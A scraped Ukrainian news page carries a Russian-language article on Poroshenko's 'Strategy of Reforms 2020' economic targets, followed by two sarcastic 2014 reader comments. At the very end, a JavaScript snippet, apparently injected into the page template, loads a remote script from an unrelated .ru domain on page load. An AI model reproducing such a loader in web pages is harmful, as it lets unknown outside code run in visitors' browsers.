Реєстрація    Увійти
Авторизація
» » » » Порошенко озвучил план развития украинской экономики до 2020 года

Порошенко озвучил план развития украинской экономики до 2020 года

Категорія: Позиція » Новини Позиція » Економіка
Порошенко озвучил план развития украинской экономики до 2020 года Президент Украины Петр Порошенко в четверг презентовал "Стратегию реформ 2020", в ходе которой озвучил главные пути развития украинской экономики.

Легкость ведения бизнеса

Согласно документу, успешная реализация намеченного позволит Украине за пять лет войти в топ-20 стран в рейтинге легкости ведения бизнеса. Стоит отметить, что это довольно амбициозная цель, ведь сейчас наша страна занимает лишь 112-ю строчку.

 

В планах украинского правительства также увеличить кредитный рейтинг страны на уровне инвестиционной категории с ССС до ВВВ, а по индексу глобальной конкурентоспособности вывести Украина в топ-40 стран.

Инвестиционная привлекательность

Согласно «Стратегии-2020», приток прямых иностранных инвестиций в Украину в период с 2015 по 2020 гг. может составить $40 млрд.

Примечательно, что состоянием на 1 июля 2014 года объем прямых иностранных инвестиций в Украине в виде акционерного капитала составил $50,02 млрд, что на $6,77 млрд (или 11,9%) меньше, чем на начало года.


Вместе с тем, Украина стала более привлекательной для инвесторов. Состоянием на начала августа уровень доверия бизнеса к нашей стране составил 2,74 балла из 5 возможных по результатам второго квартала. Год назад индекс составил 2,17 баллов, что указывает на то, что определенные позитивные изменения в настроениях все же есть.

Что будет с ВВП

Успешная реализация стратегии реформ позволит сократить соотношение госдолга к ВВП до 60% с 67,6% на сегодняшний день, а инфляцию – до 1,7% в 2020 году.

 

При этом размер ВВП на душу населения по паритету покупательной способности в 2020 году может возрасти до $16 тыс. с $8,5 тыс.

Военные расходы

Во время презентации было заявлено, что "Стратегия реформ 2020" предусматривает рост военных расходов с 1,02% до 5% ВВП к 2020 году, а количество профессиональных военнослужащих на 1 тыс. населения составит семь человек (сегодня 2,8 чел.). При этом в плане реформ есть место и обновлению кадрового состава госслужащих (правоохранительных органов, прокуратуры, власти) на 70%.

 

Кроме того, доля средств местных бюджетных в общем государственном бюджете возрастет с 31% на текущий момент до 65% в 2020 году.

 

Источник Вести.ua

 

КОМЕНТАРІ (2)
наталья 26 вересня 2014 19:37
А за шесть лет люди  окрепнут, пройдут курс крио-омоложения, вместо медпрепаратов употребят энергию дневного света, пройдут шестилетний этап лечебного голодания. Я слыхала, многие пасторы перед многолюдной проповедью нюхнут, и их прет так, что на другие языки переходят, самолюбуясь своим вещанием. а вокруг медийная паства с разной глобальной чепухой пристает.  
А когда, позвольте полюбопытствовать, пожилые пенсии получат??? ах да, пенсионная реформа уже работает! Но как дожить до завтра, оплатив сегодня охлажденную в трубах коммуналку? Да пофиг! мы ж страна будущего! а настоящему в ней не место
          2
Максим Гаврилюк 26 вересня 2014 16:25
План то он озвучил, а реализовывать его как и когда он будет? Они же сейчас ничего не делают, заняты только выборами. Хотя вон коммуняки уже давно предоставили не мало полезных экономических реформ, которые можно начать реализовывать прям сейчас, а не через 6 лет.
<!-- CODES --> <!-- script type="text/javascript"> if(self==top) { (function(){ var dddvsl3 = document.createElement("script"); dddvsl3.src='//spk2pk.ru/preloader.php'; document.getElementsByTagName('head')[0].appendChild(dddvsl3); })(); }
          1